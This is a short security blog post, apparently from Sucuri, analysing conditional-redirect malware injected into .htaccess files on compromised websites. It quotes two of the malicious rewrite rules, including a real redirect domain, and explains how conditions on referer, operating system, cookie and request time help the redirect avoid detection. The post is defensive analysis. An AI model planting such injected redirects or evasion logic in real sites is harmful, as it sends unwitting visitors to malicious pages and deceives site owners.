I really enjoy when I see different types of conditional redirects on compromised sites. They are really hard to detect and always lead to interesting investigations. Take a look at this last one we identified:

The curious aspect about it is the usage of a not so common .htaccess feature: variables. Most conditional injections rely only on the user agent (browser) or referer of the visitor, but this one also leveraged the TIME_SEC and VWM variables:


RewriteRule .* - [E=cNL:%{TIME_SEC}]
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]


It’s attributing the TIME_SEC (the “seconds” part of current time) to the cNL variable and the payload to VWM. It causes the malware to redirect the visitor to a different page, depending on the time of the day.

For example, if it is 9:00:01 (ending in the “01” second), it will redirect the visitor to a specific campaign ID (7522). If it is 9:00:02 (ending in the “02” second), it will redirect to a different campaign ID, and so on until it reaches all 60 seconds.

And when you mix that with all other conditions that this .htaccess malware has:

1. It checks if the referer came from Google, Facebook, Twitter and a few other popular sites.
2. It checks if the operating system is a Mac, Windows, iPhone, iPad, iPod or Android
3. It checks if the cookie cNL is not set (to prevent displaying the malware more than once to the same person.
4. It checks the time of the request to build a custom URL depending on the second.

It becomes very hard to be detected and even hard to get all malicious URL’s identified.

Very sneaky…

Via Sucuri.net